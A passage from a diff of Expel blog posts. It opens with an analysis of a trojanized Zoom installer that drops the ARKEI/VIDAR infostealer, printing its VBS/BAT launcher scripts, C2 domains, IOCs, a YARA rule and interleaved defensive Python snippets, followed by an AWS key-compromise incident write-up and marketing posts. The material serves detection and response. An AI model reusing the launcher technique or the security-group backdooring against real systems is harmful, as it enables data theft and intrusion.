on the left and a legitimate property details of the installer (MD5: 088999a629a254d54a061eeb1cc8b1e2 ) on the right. The property details on the right shows the legitimate installer dropped by the bundled installer on the left. The bundled Zoom installer was hosted from the malicious website hxxp://zoom-free2[.]com/download/zoominstaller.exe . When executed, a copy of a legitimate Zoom installer and malicious files are written to disk within the directory C:zoominst . The dropped files are detailed within the table below. Filename Description Hash nanohost.exe ARKEI/VIDAR Trojan 1465a5f6107ba60876e0b8d8024acdad ZoomInstaller.exe Legitimate installer 088999a629a254d54a061eeb1cc8b1e2 Icon_2.ico Zoom icon file ea3fea284dbc1ed6f173e42cb6987e39 Filename unin1213.vbs Hash 0cc21abbedd1227a1956148b929d051f Content Set WshShell = CreateObject(\"WScript.Shell\") WshShell.Run \"object73237.bat\", 0, false Filename object73237.bat Hash 3bafbf4633945d2c16523a9312e9d2fd Content @Echo off ZoomInstaller.exe timeout 3 start nanohost.exe Details of the files that are created within C:zoominst folder. While the attack successfully installs and launches a legitimate version of Zoom to avoid user suspicion, it also drops a payload named nanohost.exe on the victim\u2019s machine that performs malicious activity. nanohost.exe (shown above under \u201cfilename\u201d) is closely related to, and a variant of, the ARKEI/VIDAR information stealer (InfoStealer) malware family. nanohost.exe will query system settings, such as timezone, machine ID, hostname, display settings, hardware information, running process information and saving the queried results output to disk with the filename information.txt located within a randomly generated folder name in %PROGRAMDATA%[RANDOM]filesinformation.txt . The malware is profiling the infected system likely to be used for reference by the attacker. 
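One quick, hedged way to put the file IOCs above to work: hash a downloaded installer and compare it to the MD5s from the dropped-file table. The hash values come straight from the post; the download path in the example is a placeholder, and the absence of a match obviously does not prove a file is clean.

```python
import hashlib
from pathlib import Path

# MD5s taken from the dropped-file table in the write-up above.
KNOWN_BAD_MD5 = {
    "1465a5f6107ba60876e0b8d8024acdad": "nanohost.exe (ARKEI/VIDAR trojan)",
    "0cc21abbedd1227a1956148b929d051f": "unin1213.vbs (launcher script)",
    "3bafbf4633945d2c16523a9312e9d2fd": "object73237.bat (launcher script)",
}

def check_download(path: str) -> str:
    """MD5 a downloaded file and compare it against the published IOCs."""
    digest = hashlib.md5(Path(path).read_bytes()).hexdigest()
    if digest in KNOWN_BAD_MD5:
        return f"IOC MATCH: {digest} -> {KNOWN_BAD_MD5[digest]}"
    return f"no IOC match for {digest} (not proof the file is clean)"

print(check_download(r"C:\Users\me\Downloads\zoominstaller.exe"))  # path is a placeholder
```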
Now let\u2019s look at the format of the output data contained within the information.txt file: Version: Date: MachineID: GUID: [br] Path: Work Dir: C:ProgramData [br] Windows: Computer Name: User Name: Display Resolution: Display Language: Keyboard Languages: Local Time: TimeZone: [br] [Hardware] Processor: CPU Count: RAM: VideoCard: [br] [Network] IP: Country: City: ZIP: Coordinates: ISP: [br] [Processes] \u2014\u2014\u2014- System [] \u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014 smss.exe [] \u2013 [] \u2014 \u2013 [] [br] [Software] Contents of information.txt As per the [Network] block within the information.txt file, nanohost.exe will perform an IP geolocation lookup of the victim system using ip-api[.]com/line/ . The service returns information about the victim\u2019s public IP address such as: country, city, zip code, latitude, longitude, ISP and other details. The results are saved to information.txt . Here\u2019s an example of what the outbound HTTP POST request to the IP geolocation lookup service looks like: HTTP POST request to IP geolocation lookup service. nanohost.exe is configured to connect to the external, command-and-control (C2) server at wrangellse[.]com for additional execution of arbitrary code. The malware attempts to download additional DLL files staged within the web root directory of the C2 server. The DLL files are written to the victim machine located within the root folder of %PROGRAMDATA% . Based on the naming convention of the DLL files, these are likely used by nanohost.exe to support scraping of sensitive web browser data. Once the DLL files are downloaded from the C2 server, nanohost.exe accesses and retrieves sensitive data from FTP applications installed such as FileZilla and web browsers installed on the victim machine ranging from Internet Explorer, Google Chrome, Mozilla Firefox, Torch, Uran and various other Chromium-based browsers. After successful collection and consolidation of host reconnaissance output, browser and FTP application data, nanohost.exe sends an outbound HTTP POST request with the pertinent data within the request body to wrangellse[.]com . Here\u2019s where the malware established an outbound HTTP POST request to the C2 server. Outbound HTTP POST request containing host reconnaissance output The observed network traffic activity generated from nanohost.exe is displayed within the screenshot below. Packet capture filter display on the destination C2 server. An overview of process execution spawned from the malware-bundled Zoom installer is summarized below. Overview of malicious process activity While there\u2019s plenty more we could discuss around the capabilities of ARKEI/VIDAR trojan, the important message to re-inforce is that malware operators are continuing to adapt and take full advantage of the current, pandemic circumstances, exploiting popular trends to further push their agenda . If you\u2019re using Zoom \u2026 \u2026 then keep these tips in mind as you (or someone you know) is downloading and using the software. For employees, adhere to your organization\u2019s IT policy. Don\u2019t install unapproved software. And if you\u2019re not sure if something\u2019s approved, ask first before downloading it. When using Zoom at home on your own equipment (mobile, PC/laptop), download the software directly from Zoom\u2019s website and make sure it\u2019s secure before installing. 
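If you want to hunt for the network indicators from this analysis, here is a minimal sketch that scans a DNS query log for the distribution and C2 domains named above. The CSV column names (timestamp, client_ip, query) are hypothetical; adapt them to whatever your resolver or proxy actually logs.

```python
import csv

# Distribution and C2 domains from the analysis above (defanged with [.] in the post).
IOC_DOMAINS = {"zoom-free2.com", "wrangellse.com"}

def find_ioc_hits(dns_log_path: str) -> list:
    """Scan a CSV DNS log with hypothetical columns: timestamp, client_ip, query."""
    hits = []
    with open(dns_log_path, newline="") as handle:
        for row in csv.DictReader(handle):
            query = row["query"].rstrip(".").lower()
            if any(query == d or query.endswith("." + d) for d in IOC_DOMAINS):
                hits.append(row)
    return hits

for hit in find_ioc_hits("dns_queries.csv"):  # file name is a placeholder
    print(hit["timestamp"], hit["client_ip"], hit["query"])
```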
Don\u2019t click on a Zoom download link that was sent to you via SMS (for mobile installation), e-mail or a pop-up window that appeared while browsing the web. Instead, go directly to Zoom\u2019s website and navigate to their Downloads page . If you aren\u2019t joining a Zoom meeting through a mobile app, software client or browser extension, go to Zoom\u2019s official website and use their Join A Meeting option to connect directly to the meeting from your browser. Be sure to follow the same rules in the bullet above. Take the time to read through the privacy and security resource guides made available by Zoom. We\u2019re working on another blog post all about recommended, hardening settings for your Zoom meetings to help avoid potential risks. Stay tuned. While attackers may use these strange times as an opportunity to strike, remember that there are measures we can all take to protect ourselves. Stay safe, everyone. Below are charts that can be used as reference. MITRE ATT&CK Matrix Table Initial Access Drive-by Compromise Execution Third-party Software, User Execution Defense Evasion Hidden Window, Software Packing Credential Access Credentials from Web Browsers, Credentials in Files Discovery File and Directory Discovery, Process Discovery, Query Registry, Software Discovery, System Information Discovery, System Network Configuration Discovery, System Owner/User Discovery, System Time Discovery Collection Automated Collection, Data from Local System Command And Control Remote File Copy, Standard Application Layer Protocol Exfiltration Automated Exfiltration, Data Compressed, Exfiltration Over Command and Control Channel MITRE ATT&CK Matrix Table Indicators Type Artifact Network zoom-free2[.]com Network wrangellse[.]com Network ip-api[.]com File Path %PROGRAMDATA%vcruntime140.dll File Path %PROGRAMDATA%softokn3.dll File Path %PROGRAMDATA%nss3.dll File Path %PROGRAMDATA%msvcp140.dll File Path %PROGRAMDATA%mozglue.dll File Path %PROGRAMDATA%freebl3.dll File Path %PROGRAMDATA%filesSoftAuthy File Path c:zoominstunin1213.vbs File Path c:zoominstobject73237.bat File Path c:zoominstnanohost.exe File Path c:zoominstZoomInstaller.exe File Path %USERPROFILE%Downloadszoominstaller.exe Hash 1465a5f6107ba60876e0b8d8024acdad Hash 2c59f16921956b05f97a5b3e208168a6 File Name information.txt File Name passwords.txt File Name ld Indicator of compromise (IOC) Detections YARA Rule rule ZOOMBA { meta: author = \"@heyjokim\" description = \"Self-extracting, Zoom installer bundled with malware\" reference = \"2c59f16921956b05f97a5b3e208168a6\" strings: $s1 = \"ZoomInstaller.exe\" $s2 = \"Release\\sfxrar.pdb\" condition: uint16(0) == 0x5A4D and all of ($s*)} Custom detections" +} \ No newline at end of file diff --git a/managed-detection-and-response-mdr-symptom-or.json b/managed-detection-and-response-mdr-symptom-or.json new file mode 100644 index 0000000000000000000000000000000000000000..83b6b3e7c703ad8d966520f7ffbefc83ff515837 --- /dev/null +++ b/managed-detection-and-response-mdr-symptom-or.json @@ -0,0 +1,6 @@ +{ + "title": "Managed detection and response (MDR): symptom or ...", + "url": "https://expel.com/blog/managed-detection-and-response-mdr-symptom-or-solution/", + "date": "Jan 11, 2018", + "contents": "Subscribe \u00d7 EXPEL BLOG Managed detection and response (MDR): symptom or solution? Security operations \u00b7 5 MIN READ \u00b7 DAVE MERKEL \u00b7 JAN 11, 2018 \u00b7 TAGS: Managed detection and response / Managed security / MDR / Selecting tech / Tools Newsflash! 
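The ZOOMBA YARA rule at the end of the post can be run locally with the yara-python bindings. A minimal sketch, assuming yara-python is installed; the rule text is the post's, lightly reformatted onto multiple lines, and the file path is a placeholder.

```python
import yara  # assumes `pip install yara-python`

# The ZOOMBA rule from the post, reformatted for readability.
ZOOMBA_RULE = r'''
rule ZOOMBA {
    meta:
        author = "@heyjokim"
        description = "Self-extracting, Zoom installer bundled with malware"
        reference = "2c59f16921956b05f97a5b3e208168a6"
    strings:
        $s1 = "ZoomInstaller.exe"
        $s2 = "Release\\sfxrar.pdb"
    condition:
        uint16(0) == 0x5A4D and all of ($s*)
}
'''

rules = yara.compile(source=ZOOMBA_RULE)
for match in rules.match("suspect_zoominstaller.exe"):  # path is a placeholder
    print("matched rule:", match.rule)
```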
Managed security service providers (MSSPs), for the most part, kinda suck . They\u2019re really good at taking your money. But, if you\u2019re looking for security operations capability \u2014 y\u2019know, like finding bad guys or investigating a breach \u2014 your odds are better if you\u2019re looking elsewhere. \u201cBut wait! We do that!\u201d they say. \u201cUmmm \u2026 no. You actually don\u2019t,\u201d say their customers (right before they switch providers \u2026 again \u2026 repeating the cycle of disillusionment anew). Customer dissatisfaction with MSSPs has gotten so bad that a whole new \u201cproto-market\u201d has popped up that basically \u2026 well \u2026 it does the things customers thought they were getting (but ultimately didn\u2019t) when they first signed their MSSP contract. Industry analysts have even anointed it with its own three-letter acronym: Managed Detection and Response (MDR). The term has been around for a while. In fact, I was a witness to its creation (more on that later). But I still run into lots of folks that don\u2019t necessarily understand what MDRs do. And I don\u2019t hear a lot of people calling it by that name. It could be because we vendors are craptastic at telling people what we do (I\u2019m not sure where we caught that disease\u2026 but it\u2019s rampant). But I think there\u2019s a different reason: MDR isn\u2019t really a market. It\u2019s a symptom. Specifically, MDR is a symptom of MSSPs\u2019 lack of innovation. They whiffed so hard that they let a whole new mini market pop up in their front yard. Full disclosure: Expel is playing in this space, so this is your fair warning that this post is obviously self serving. But, at least I\u2019m being honest about it. And it does reflect my thoughts on the state of the universe, for better or for worse. Read on at your own peril. So what do I mean when I say that MDR isn\u2019t a market? I\u2019ll tell you what I don\u2019t mean. I don\u2019t mean the capabilities that MDRs provide are useless. If I believed that I wouldn\u2019t have founded Expel. What I mean, is that it\u2019s not a long-term market \u2026 at least not in its current form. The emergence of MDRs is a sign that customers want (and need) REAL managed security that \u2026 ummmm \u2026 manages their security. There\u2019s no doubt that MDRs offer pieces of what companies want \u2026 but not (yet) most of what they need: managed security that doesn\u2019t suck. First, let\u2019s back up and consider how this MDR thing came to pass. It turns out I was there at the beginning. Or, perhaps, more accurately, \u201ca beginning\u201d since new market trends \u2014 even ones with an acronym \u2014 rarely have a sole genesis. In any case, here\u2019s my specific superhero (villain?) origin story: Once upon a time \u2026 in the old country (a shorthand we use at Expel to refer to places we used to work) we had a really advanced endpoint product. It was ugly from a UX perspective (my fault) but we could make it sing. Sadly, many potential customers couldn\u2019t. When the evildoers invaded our customers\u2019 networks we used that product to provide incident response services. Once we had banished the villains and solved the customer\u2019s problem we would pack up to leave. Then it came to pass that the customer would practically tackle us and beg us to stay: \u201cWe can\u2019t do what you do \u2026 and neither can our MSSP. What you\u2019re doing is *really* valuable. Can I have some more?\u201d they would cry. 
They huffed and they puffed and after we were hit in the head enough times with this two-by-four, we finally said \u201cy\u2019know, there might be a business here.\u201d We experimented with a few customers, tailoring a managed threat hunting/investigation offering on top of our endpoint product. We sold a few and decided to make it a business. It grew \u2026 and grew \u2026 and grew \u2026 and focused primarily on using our own endpoint technology and only on finding truly advanced threats. And everybody lived happily ever after. We sold a new managed offering which included our product. The customer didn\u2019t have to develop (and \u2026 even more difficult \u2026 maintain) the expertise to do what we could do. Since then, other MDR vendors have crafted their own similarly shaped origin stories. Perhaps a specific use case, technology or market shaped their offering. They found a niche and conquered it. There\u2019s nothing wrong with that. These MDRs have made the world a better place. Here are four reasons why: 1. They find bad guys and gals: Huzzah! That\u2019s their reason for being, so this shouldn\u2019t be surprising. 2. They use modern tech: It sounds obvious but it\u2019s super important \u2026 and many MSSPs don\u2019t do it. Most MDR providers use technologies built in the current decade. These modern capabilities offer defenders more options for visibility and they can keep you nimble if you use them properly. 3. Better yet \u2026 they use endpoint tech: Double clicking (did I just really say that?) on #2 \u2026 MDR offerings use endpoint product offerings and data in a completely competent way. This is huge. Endpoint products are often complicated and interpreting the data requires a fair degree of sophistication \u2026 but the results are key to modern threat detection and response. 4. They\u2019re adversary oriented: Some MDR offerings raise awareness of how capable the adversary actually is. This can impact spending and how the business views security. Again, that\u2019s a good thing. Still \u2026 all of ^these^ things fall under the category of \u201cstuff MSSPs should have been doing all along, but aren\u2019t.\u201d But the reason why I don\u2019t think MDR is a market \u2026 or at least not the end state of the managed security market is that there are some big things that MDRs (as currently defined) don\u2019t do. And the fact that they don\u2019t do them limits the value pure-play MDRs can deliver. Here are a few examples: They don\u2019t use your existing tech: Often, MDR vendors bring some of their own security products to the proverbial table. This can force you to ditch (or ignore) something you already paid for (a network sensor, a SIEM or endpoint tool) regardless of whether or not your existing product is capable. Not awesome. They\u2019re threat snobs: Frequently, MDR providers focus on \u201cadvanced\u201d threats. Chasing super-elite bad guys makes for great war stories. But less sophisticated individuals acting of their own accord could cripple your business. The time it takes advanced tactics to trickle down to these types of threat actors continues to shrink. Can you afford to be snooty about the threats your solutions providers pay attention to? Compliance \u2026 huh? MDRs are often less interested in compliance use cases. While I\u2019d never argue that compliance=security, that doesn\u2019t eliminate the need to be compliant \u2014 particularly in more heavily regulated businesses. 
Security operations: Ultimately, most organizations need a solid, functioning security operations capability. MDRs aren\u2019t that. They\u2019re expensive, almost \u201cprofessional services\u201d shaped offerings that are good at finding shiny things, but not so much at addressing your security operations gap. They\u2019re not transparent: For all the things MDRs are doing that are an improvement on the legacy MSSP market, they still suffer from the black box approach that has frustrated so many MSSP customers. Their value stops when the alerts stop: What did you pay for? What did they do? If there weren\u2019t bad guys attacking you on a random Tuesday, what value did they provide? If the bad guys stayed home (and no alerts fired) how will you defend your spend to the business? How did they make you better? MDRs should be sucking the air out of the MSSP balloon. But they\u2019re not (yet). Instead, I\u2019ve seen scenarios where customers are paying twice, either stitching together multiple MSSPs or layering an MDR on top of an MSSP. Or \u2026 perhaps the most troubling scenario I\u2019ve seen \u2026 a company with two MSSPs who hired a third consulting company to manage their MSSPs. It\u2019s kinda like what you find with network or endpoint security technologies \u2014 \u201cDefense (aka expense) in depth.\u201d Why is this happening? Well \u2026 MDRs still need to close the gaps I highlighted above. Customers aren\u2019t looking for an acronym and they don\u2019t care much about your origin story. They just want someone to solve their problem. MDRs do some of that today \u2026 but they still have some ground to cover starting with using the security investments you\u2019ve already made. Wouldn\u2019t that be great? Yeah, we think so too. Someone should do something about that one of these days." +} \ No newline at end of file diff --git a/managed-detection-response-for-aws-access-keys.json b/managed-detection-response-for-aws-access-keys.json new file mode 100644 index 0000000000000000000000000000000000000000..0bfaefd19002007a5042abfa414c77d950fb5f6d --- /dev/null +++ b/managed-detection-response-for-aws-access-keys.json @@ -0,0 +1,6 @@ +{ + "title": "Managed Detection & Response for AWS Access Keys", + "url": "https://expel.com/blog/finding-evil-in-aws/", + "date": "Apr 28, 2020", + "contents": "Subscribe \u00d7 EXPEL BLOG Managed Detection & Response for AWS Security operations \u00b7 7 MIN READ \u00b7 ANTHONY RANDAZZO, BRITTON MANAHAN AND SAM LIPTON \u00b7 APR 28, 2020 \u00b7 TAGS: CISO / Company news / Get technical / Heads up / Managed security Detection and response in cloud infrastructure is a relatively new frontier. On top of that, there aren\u2019t many compromise details publicly available to help shape the detection strategy for anyone running workloads in the cloud. That\u2019s why our team here at Expel is attempting to bridge the gap between theory and practice. Over the years, we\u2019ve detected and responded to countless Amazon Web Services (AWS) incidents, ranging from public S3 bucket exposures to compromised EC2 instance credentials and RDS ransomware attacks. Recently, we identified an incident involving the use of compromised AWS access keys. In this post, we\u2019ll walk you through how we caught the problem, what we observed in our response, how we kicked the bad guy out and the lessons we learned along the way. Compromised AWS access keys: How we caught \u2018em We first determined there was something amiss thanks to an Expel detection using CloudTrail logs. 
Here at Expel, we encourage many of our customers who run on AWS to use Amazon GuardDuty. But we\u2019ve also taken it upon ourselves to develop detection use cases against CloudTrail logs . GuardDuty does a great job of identifying common attacks, and we\u2019ve also found CloudTrail logs to be a great source of signal for additional alerting that\u2019s more specific to an AWS service or an environment. It all started with the alert below, telling us that EC2 SSH access keys were being generated ( CreateKeyPair / ImportKeyPair ) from a suspicious source IP address. Initial lead Expel alert How\u2019d we know it was suspicious? We\u2019ve created an orchestration framework that allows us to launch actions when certain things happen. In this case, when an alert fired an Expel robot picked it up and added additional information. This robot uses a third-party enrichment service for IPs (in this case, our friends at ipinfo.io ). More on our robots here shortly. Keep in mind that these are not logins to AWS per se. These are authenticated API calls with valid IAM user access keys. API access can be restricted at the IP layer, but it can be a little burdensome to manage in the IAM Policy. As you can see in the alert shown above, there was no MFA enforced for this API call. Again, this was not a login, but you can also enforce MFA for specific API calls through the IAM Policy . We\u2019ve observed only a few AWS customers using either of these controls. Another interesting detail from this alert was the use of the AWS Command Line Interface (CLI) . This isn\u2019t completely out of the norm, but it heightened our suspicion a bit because it\u2019s less common than console (UI) or AWS SDK access. Additionally, we found this user hadn\u2019t used the AWS CLI in recent history, potentially indicating a new person was using these credentials. The manual creation of an access key was also an atypical action versus leveraging infrastructure as code to manage keys (i.e. CloudFormation or Terraform). Taking all of these factors into consideration, we knew we had an event worthy of additional investigation. Cue the robots, answer some questions Our orchestration workflows are critically important \u2013 they tackle highly repetitive tasks, that is answer questions an analyst would ask about an alert, on our behalf as soon as the alert fires. We call these workflows our robots. When we get an AWS alert from a customer\u2019s environment, we have three consistent questions we like to answer to help our analysts determine if it\u2019s worthy of additional investigation (decision support): Did this IAM principal (user, role, etc.) assume any other roles? What AWS services does this principal normally interact with? What interesting API calls has this principal made? So, when the initial lead alert for the SSH key generation came in, we quickly understood that role assumption was not in play for this compromise. If the user had assumed roles, it would have been key to identity and include them in the investigation. Instead, we saw the image below: Expel AWS AssumeRole Robot Once we knew access was limited to this IAM user, we wanted to know what AWS services this principal generally interacts with. Understanding this helps us spot outlier activity that\u2019s considered unusual for that principal. Seeing the very limited API calls to other services further indicated that something nefarious might be going on. 
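For a rough idea of what the IP-enrichment "robot" described above does, here is an illustrative sketch that pulls context for a source IP from ipinfo.io. It assumes the requests library; the endpoint and response fields follow ipinfo's public API as I understand it (verify before relying on it), and the IP shown is a documentation placeholder.

```python
import requests

def enrich_ip(ip: str, token: str = "") -> dict:
    """Fetch basic context (org, geo) for an IP from ipinfo.io."""
    params = {"token": token} if token else {}
    resp = requests.get(f"https://ipinfo.io/{ip}/json", params=params, timeout=10)
    resp.raise_for_status()
    return resp.json()

info = enrich_ip("198.51.100.23")  # placeholder IP from the TEST-NET-2 range
print(info.get("org"), info.get("country"), info.get("city"))
```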
Expel AWS Service Interaction Robot Finally, we wanted to see what interesting API calls the principal made. From a detection perspective, we define interesting API calls in this context to be mostly anything that isn\u2019t Get*, List*, Describe* and Head*. This enrichment returned 344 calls to the AuthorizeSecurityGroupIngress API from the AWS CLI user-agent. This is really the tipping point for considering this a security incident. Expel AWS Interesting API Robot How we responded After we spotted the attack, we needed to scope this incident and provide the measures for containment. We framed our response by asking the primary investigative questions. Our initial response was going to be limited to determining what happened in the AWS control plane (API). CloudTrail was our huckleberry for answering most of our questions. What credentials did the attacker have access to? How long has the attacker had access? What did the attacker do with the access? How did the attacker get access? What credentials did the attacker have access to? By querying historical CloudTrail events for signs of this attacker, Expel was able to identify that they had access to a total of eight different IAM user access keys, and was active from two different IPs. If we recall from earlier, we were able to use our robot to determine that no successful AssumeRole calls were made, limiting our response to these IAM users. How long has the attacker had access? CloudTrail indicated that most of the access keys had not been used by anyone else in the past 30 days thus we can infer that the attacker likely discovered the keys recently. What did the attacker do with the access? Based on observed API activity, the attacker had a keen interest in S3, EC2 and RDS services as we observed ListBuckets , DescribeInstances and DescribeDBInstances calls for each access key, indicating an attempt to see which of these resources was available to the compromised IAM user. As soon as the attacker identified a key with considerable permissions, DescribeSecurityGroups was called to determine the level of application tier access (firewall access) into the victim\u2019s AWS environment. Once these groups were enumerated, the attacker \u201cbackdoored\u201d all of the security groups with a utility similar to aws_pwn\u2019s backdoor_all_security_group script . This allowed for any TCP/IP access into the victim\u2019s environment. Additional AuthorizeSecurityGroupIngress calls were made for specific ingress rules for port 5432 (postgresql) and port 1253, amounting to hundreds of unique Security Group rules created. These enabled the attacker to gain network access to the environment and created additional risks by exposing many AWS service instances (EC2, RDS, etc.) to the internet. A subsequent DescribeInstances call identified available EC2 instances to the IAM user. The attacker then created a SSH key pair (our initial lead alert for CreateKeyPair ) for an existing EC2 instance. This instance was not running at the time so the attacker turned it on via a RunInstances call. Ultimately, this series of actions resulted in command line access to the targeted EC2 instance, at which point visibility can be a challenge without additional OS logging or security products to investigate instance activity. How did the attacker get credentials? While frustrating, it\u2019s not always feasible to identify the root cause of an incident for a variety of reasons. 
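The post defines "interesting" API calls as roughly anything that isn't Get*, List*, Describe* or Head*. Here is a small illustrative filter over CloudTrail records built on that definition; the sample events are hand-made and real records carry many more fields.

```python
from collections import Counter

READ_ONLY_PREFIXES = ("Get", "List", "Describe", "Head")

def interesting_calls(events: list) -> Counter:
    """Count CloudTrail eventNames that aren't read-only, per the post's definition."""
    counts = Counter()
    for event in events:
        name = event.get("eventName", "")
        if name and not name.startswith(READ_ONLY_PREFIXES):
            counts[name] += 1
    return counts

# Hand-made sample records for illustration only.
sample = [
    {"eventName": "DescribeSecurityGroups"},
    {"eventName": "AuthorizeSecurityGroupIngress"},
    {"eventName": "AuthorizeSecurityGroupIngress"},
    {"eventName": "CreateKeyPair"},
]
print(interesting_calls(sample))  # -> AuthorizeSecurityGroupIngress: 2, CreateKeyPair: 1
```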
For example, sometimes the technology simply doesn\u2019t produce the data necessary to determine the root cause. In this case, using the tech we had available to us, we weren\u2019t able to determine how the attacker gained credentials, but we have the following suspicions: Given multiple credentials were compromised, it\u2019s likely they were found in a public repository such as git, an exposed database or somewhere similar. It\u2019s also possible credentials were lifted from developer machines directly, for example the AWS credentials file. We attempted to confirm these, but couldn\u2019t get to an answer in this case. Though unfortunate, it offers an opportunity to work with the victim to improve visibility. For reference, below are the Mitre ATT&CK Cloud Tactics observed during Expel\u2019s response. Initial Access Valid Accounts Persistence Valid Accounts, Redundant Access Privilege Escalation Valid Accounts Defensive Evasion Valid Accounts Discovery Account Discovery Cloud Security Threat Containment By thoroughly scoping the attacker\u2019s activities, we were able to deliver clear remediation steps. This included: Deleting the compromised access keys for the eight involved IAM user accounts; Snapshotting (additional forensic evidence) and rebuilding the compromised EC2 instance; Deleting the SSH keys generated by the attacker; And deleting the hundreds of Security Group ingress rules created by the attacker. Resilience: Helping our customer improve their security posture When we say incident response isn\u2019t complete without fixing the root of the problem \u2013 we mean it . One of the many things that makes us different at Expel is that we don\u2019t just throw alerts over the fence. That would only be sort of helpful to our customers and puts us in a position where we\u2019d have to tackle the same issue on another day \u2026 and likely on many more days after that. We\u2019re all about efficiency here. That\u2019s why we provide clear recommendations for how to solve issues and what actions a customer can take to prevent these kinds of attacks in the future. Everybody wins (except for the bad guys). While we weren\u2019t certain how the access keys were compromised in the first place, below are the resilience recommendations we gave our customer once the issue was resolved. Expel AWS Resilience (1) If the IAM user is unused, then it probably doesn\u2019t need to remain active in your account. We made this recommendation because these access keys hadn\u2019t been in use by anyone other than the attacker in the previous 30 days. Expel AWS Resilience (2) Since the access keys for this IAM principal were at least 30 days old given that no activity occurred from a legitimate user, it was time to do some tidying up, so to speak. If you need that user, rotate the access keys on a regular basis. Expel AWS Resilience (3) We noticed that this IAM user had far too many EC2 permissions and thought this resilience measure was in order. We also shared that it would be far safer to delegate those EC2 permissions with an IAM role. Lessons learned Fortunately, we were able to disrupt this attack before there was any serious damage, but it highlighted the very real fact that cloud infrastructure \u2013 whether you\u2019re running workloads on AWS or somewhere else \u2013 is a prime target for attackers. As with every incident, we took some time to talk through what we discovered through this investigation and are sharing our key lessons here. 
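Here is a hedged boto3 sketch of the containment steps listed above: deleting the compromised access keys, removing the attacker's SSH key pair, and revoking the backdoored ingress rules. Every identifier is a placeholder, and in a real response you would snapshot the affected instance and preserve evidence before tearing anything down.

```python
import boto3

iam = boto3.client("iam")
ec2 = boto3.client("ec2")

# 1. Remove the compromised long-term credentials (repeat per affected IAM user).
iam.delete_access_key(UserName="ci-cd-user", AccessKeyId="AKIAEXAMPLEKEYID1234")

# 2. Delete the SSH key pair the attacker registered (the CreateKeyPair lead alert).
ec2.delete_key_pair(KeyName="attacker-generated-key")

# 3. Revoke one of the backdoored ingress rules (repeat per rule the attacker created).
ec2.revoke_security_group_ingress(
    GroupId="sg-0123456789abcdef0",
    IpPermissions=[{
        "IpProtocol": "tcp",
        "FromPort": 5432,
        "ToPort": 5432,
        "IpRanges": [{"CidrIp": "0.0.0.0/0"}],
    }],
)
```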
AWS customers must architect better security \u201cin\u201d the cloud. That is, create greater visibility into the EC2 and other infrastructure identified in the shared responsibility model. You can\u2019t find evil if the analysts don\u2019t know what to look for \u2013 train, train some more, and then when you\u2019re done training, train again. Special thanks to Scott Piper ( @0xdabbad00 ) and Rhino Security Labs ( @RhinoSecurity ) for their contributions to AWS security research. While security in the cloud is still relatively in its infancy, the same can be said for the attacker behaviors \u2013 much of what we observed here and in the past were elementary attack patterns. There are additional automated enrichment opportunities. We\u2019ve started working on a new AWS robotic workflow to summarize historical API usage data for the IAM principal and will compare it to the access parameters of the alert. Be on the lookout for an additional blog post in the future for our automated AWS alert enrichments. Until then, check out our other blogs to learn more about how we leverage AWS cloud security for our customers, along with tips and tricks for ramping up your own org\u2019s security when it comes to cloud." +} \ No newline at end of file diff --git a/meet-us-at-moscone-expel-makes-its-rsac-debut.json b/meet-us-at-moscone-expel-makes-its-rsac-debut.json new file mode 100644 index 0000000000000000000000000000000000000000..9ff8dd560b71e98239fa266549a308d614388a3c --- /dev/null +++ b/meet-us-at-moscone-expel-makes-its-rsac-debut.json @@ -0,0 +1,6 @@ +{ + "title": "Meet us at Moscone\u2026 Expel makes its #RSAC debut!", + "url": "https://expel.com/blog/expel-makes-its-rsa-debut/", + "date": "May 12, 2022", + "contents": "Subscribe \u00d7 EXPEL BLOG Meet us at Moscone\u2026 Expel makes its #RSAC debut! Expel insider \u00b7 2 MIN READ \u00b7 KELLY FIEDLER \u00b7 MAY 12, 2022 \u00b7 TAGS: Cloud security / Company news / MDR / Tech tools Expletives have attended RSA Conference (RSAC) for years, and many attended before they were Expletives \u2014 not to mention, before there was an Expel. But this year is different. For the first time, Expel is headed to Moscone Center as an exhibitor. You could say we\u2019re pretty excited. Why are we so over-the-moon about this? A few reasons (and we\u2019re not just talking about the free swag or the trolley rides). It\u2019s a pivotal time in the detection and response market space. Mostly, because it\u2019s also a confusing time \u2014 full of options (MDR and XDR), uncertainty, and noise. With a constantly evolving threat landscape, businesses need security partners that aren\u2019t just answering their questions today but are looking ahead to prepare for the questions of tomorrow. More threats with increasing complexity mean businesses have to keep up and make sense of all the noise \u2014 fast. That\u2019s why we\u2019ve made it our mission to make security easy to understand, easy to use, and easy to continuously improve. Our promise is to show you that security can be delightful. What does that look like? Expel partners with you to create an approach that\u2019s tailored to your environment, your people, and your processes. We integrate with your existing tech to drive greater value, then through automation quickly learn to analyze and correlate alerts across your systems and attack surfaces, 24\u00d77. Our friendly bots, Josie\u2122 and Ruxie\u2122, free up our analysts so they can make the quick, well-informed decisions best suited to humans. 
Josie analyzes alerts as they come in for triage, surfacing the most important ones, and Ruxie gives analysts critical information about threats so they can strategize on the best remediation approach. It\u2019s how tech and people should work together. The result? A platform that makes it easier to detect, understand, and fix issues fast so business risk is managed. Breathe easier knowing your team has the answers they need, when they need them. Really, it\u2019s security that makes sense. We can\u2019t wait to share this approach to security with you. Just like in years past, RSAC is a great place to connect with old friends, shake new hands, and of course, talk security. The difference is that this year, we\u2019ll do it at our own booth. Stop by the Expel booth (S649) in the South Hall to meet our crew, check out a demo, enjoy some live freestyle rap from YouTube sensation, Harry Mack (seriously!). While you\u2019re there, catch up with Josie and Ruxie \u2014 you might even snag a cool plushie\u2026 Before the conference, get a sneak-peek at what it\u2019s like to work with Expel with this overview video . Ready to talk shop? Go ahead and schedule a meeting ." +} \ No newline at end of file diff --git a/mission-matters-watch-your-signals.json b/mission-matters-watch-your-signals.json new file mode 100644 index 0000000000000000000000000000000000000000..f6ada7f030315e0829a5fd4973d7bc2caff7cc85 --- /dev/null +++ b/mission-matters-watch-your-signals.json @@ -0,0 +1,6 @@ +{ + "title": "Mission matters: watch your signals", + "url": "https://expel.com/blog/mission-matters-watch-signals/", + "date": "Sep 28, 2017", + "contents": "Subscribe \u00d7 EXPEL BLOG Mission matters: watch your signals Talent \u00b7 3 MIN READ \u00b7 YANEK KORFF \u00b7 SEP 28, 2017 \u00b7 TAGS: Employee retention / Great place to work / Management / Mission I was at a company-wide all hands meeting and one of the executives came on stage to rally the troops, like you do. There was music, there was fanfare, there was applause and I probably wanted to be elsewhere. Not into the cyber-rockstar thing. Still, don\u2019t let the show fool you \u2013 he was a sharp executive. Particularly in his understanding of capital market dynamics: the push and pull of investor 